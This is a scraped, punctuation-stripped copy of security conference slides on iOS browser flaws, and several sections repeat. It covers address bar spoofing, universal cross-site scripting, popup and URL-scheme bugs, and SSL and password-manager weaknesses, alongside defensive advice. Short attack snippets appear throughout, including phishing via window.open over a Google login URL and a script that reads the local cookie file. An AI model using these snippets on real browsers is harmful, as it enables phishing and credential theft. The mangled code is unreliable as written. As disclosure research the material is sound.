bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 22: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/22.jpg)
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 23: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/23.jpg)
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
